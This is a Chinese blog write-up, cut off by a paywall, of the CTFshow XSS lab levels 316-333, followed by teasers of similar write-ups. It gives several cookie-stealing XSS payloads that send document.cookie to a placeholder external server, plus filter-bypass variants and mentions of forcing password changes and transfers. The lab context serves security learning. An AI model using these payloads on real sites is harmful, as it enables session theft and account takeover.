[WP/CTFshow]XSS Web316-333

最新推荐文章于 2025-08-05 15:51:38 发布
原创 最新推荐文章于 2025-08-05 15:51:38 发布 · 1.9k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #xss

本文详细介绍了反射型XSS漏洞的利用方式,包括通过JavaScript注入、事件触发、字符绕过等手段,展示了如何构造XSS脚本来窃取或操纵Cookies。同时,还探讨了针对管理员Cookie的获取策略,如利用Burp Suite抓包分析和异步数据获取。此外,提到了密码修改和金额转账的潜在攻击场景,并提醒了HTTP GET请求的参数长度限制和DoS风险。

CTFSHOW WP

题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS

316.需要配套接收端XSS脚本

如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。

本解法直接将产生请求写在了表层。

<script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script>
317、318、319
<body onload="document.location.href='http://xxxxxxxxxxxxxxxxx/x.php?1='+document.cookie"></body>
320、321、322、323、324、325、326

空格过滤

可用tab,/**/等绕过

实测iframe,script,blog被过滤

<body/**/οnlοad="document.location.href='http://xxxxxxxxxxxx/x.php?1='+document.cookie"></body>
<body/οnlοad="document.location.href='http://xxxxxxxxxxxxx/x.php?1='+document.cookie"></body>
327

收件人admin

328、329、330

329会在访问后注销COOKIE

思路一

<script>document.location.href='http://xxxxxxxxxxxxxxxxxxx/x2.php?1='+document.cookie;</script>

XSS获取到管理员COOKIE,PHP令牌

1.在存储中修改COOKIE(),直接读取数据(前

最低0.47元/天 解锁文章
ctfshow XSS web316-web333 wp
mumuzi的博客
02-05 6272
可能写的有点啰嗦,记录自己做题的过程 文章目录web316web317web318web319web320web321web322web323web324web325web326web327web328web329web330web331web332web333 web316 后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的时候我们就能拿到admin的cookie。 这里有两种方法来获取,一种是在线的xss平台,如https:/
CTFshow XSS(web316-333)
Kradress的博客
03-18 1059
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
ctfshow XSS web316~web333
shinygod的博客
11-25 2349
ctfshow XSS web316~web333
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 2836
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
CTFshow刷题日记-WEB-XSS(web316-333)
Love&Share
09-29 6144
web316-无过滤反射型XSS 大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接 方法一:xss平台 利用xss平台生成链接 xss平台 https://xsshs.cn/,https://xss.pt/,http://xsscom.com 在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中 刷新下页面,然后在平台查看项目 方法二:自动接收脚本 在自己的服务器上放一个PHP代码 # a.php <?php $cookie
ctfshow-xxs-316-333-wp
2301_80915592的博客
03-15 1075
316.反射型 XSS-326都是反射型)js恶意代码是存在于某个参数中,通过url后缀进行get传入,当其他用户点进这个被精心构造的url链接时,恶意代码就会被解析,从而盗取用户信息。来看题,先简单测试一下是xxs直接注入(代码意思是浏览器解析这段代码时,会弹出一个警告对话框,显示当前网页的所有 Cookie 信息)弹出flag=你不是管理员。显然,由于我们不是管理员,所以cookie参数是不正确的。
CTFshow-web入门 XSS316-333(已更新完)
2302_79841575的博客
08-03 1629
本文系统总结了XSS跨站脚本攻击的实战技巧,重点分析了反射型和存储型XSS的利用方法。通过系列靶场案例(web316-333),详细演示了不同过滤条件下的绕过方式:1)使用body/iframe/svg标签替代script;2)通过/**/注释符绕过空格过滤;3)利用window.open/document.cookie窃取会话信息;4)结合AJAX实现POST请求攻击。特别对存储型XSS的自动化利用场景(如修改管理员密码、资金转账)进行了深入剖析,展示了如何通过恶意脚本控制目标账户。文章还提供了CEYE监
ctfshow(316,317,318)--XSS漏洞--反射性XSS
m0_56019217的博客
11-06 775
当前页面的cookie是flag=you%20are%20not%20admin%20no%20flag。但是这里我使用XSS平台,显示的cookie还是这样,并不能得到flag。首先想到利用XSS平台解题,看其他师傅的wp提示flag是在cookie中。于是我们使用稳定性更高的方法:写js代码将cookie传到自己的服务器上。查看自己服务器中的cookie.txt文件,得到flag。显示是关于反射性XSS的题目。提交之后成功跳转到自己的网页。
ctfshow_web316-326_反射型XSS
记录学习成长之路上的点点滴滴
05-08 1416
2023/05/07 ctfshow刷题 web316-326 反射型XSS
ctfshow-xss(web316-web330)
m0_72125469的博客
07-03 1813
web317讲解相当细致精致练习XSSweb316这道题估计陆陆续续弄了半天 因为xss可以说基本不会 还好最终彻彻底底明白了首先这道题是反射性xss 也就是必须点击某一个xss链接 才能达到xss效果这道题的意思就是 写一个祝福语生成链接发送给朋友 这个祝福语的位置就是我们实现XSS的位置已知:flag在BOT(程序,机器人)的cookie中并且 生成的链接后端BOT会每隔一段时间访问所以 要构造一个含有XSS的链接 使得管理员只要访问就能获取BOT的cookie。
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 2340
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
别怕宝贝ctfshow--xss web316-326一命速通(一payload速通)
2302_79590880的博客
10-30 997
记一个payload打通11关。。。。。
Ctfshow web入门 XSSweb316-web333 详细题解 全
Jay17的博客
09-28 9072
Ctfshow web入门 XSSweb316-web333 详细题解 全
CTFSHOW XSS web入门316-333
SwagRee_的博客
04-10 2037
然后就拿到了 不过这里可能有时候会拿不到。
ctfshow web 入门 xss注入 web316-web333
2401_87543722的博客
07-31 1415
开始xxs注入,打开题目是一个输入框。测试看看是否有xss注入漏洞,成功弹出对话框尝试获取cookie,显示不是管理员没有flag接着就是xss注入的登场。在自己的vps上面写入如下内容:(这里直接用宝塔创建了一个站点)在url参数里面就可以利用下面的获取cookie,这段脚本会立即把浏览器重定向到指定地址,并且会将cookie通过url参数传递。<script>是html中的标签,用于嵌入javascript代码。
CTFSHOW-web入门-XSSweb316-333
最新发布
JL20050725的博客
08-05 798
那现在的思路就变成了Cookie盗取,让管理员一上线便会触发我们发的留言里的js代码,然后将自己的Cookie发送到我们指定的位置。这个时候稍等片刻,会有个类似admin管理员的程序每隔一段时间就查看我们提交的留言便会触发恶意的XSS代码,然后就可以拿到admin的cookie。既然没法通过盗取cookie伪造admin了,那我们可以将XSS的恶意代码替换成直接将用户管理页面的内容上传到我们的服务器。那我们便可以在注册的时候写入恶意的XSS代码,让管理员一看到就将自己的密码修改成我们指定的。
XSS学习笔记(一)、CTFSHOW-316到331关卡绕过WP
m0_63917373的博客
10-28 1876
XSS绕过-CTFSHOW-316到331关卡绕过WP XSS修复-过滤函数&http_only&CSP&长度限制 XSS
kali之beef使用以及ctf.show的XSS(web316-web333)
wanan的博客
09-30 642
kali之beef使用以及ctf.show的XSS(web316-web333)
【CTF-WebXSS漏洞学习笔记(附ctfshow web316-333题目)
jayq1的博客
06-07 6115
XSS
ctfshow web1-20
04-01
### CTFShow Web 1 至 20 关解题思路 以下是关于 CTFShow 平台上 Web 类第 1 到 20 关的部分解题思路和相关信息: #### Web 1 通过分析 URL 参数 `id` 的传递方式,可以发现其存在 SQL 注入漏洞。尝试输入特殊字符...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值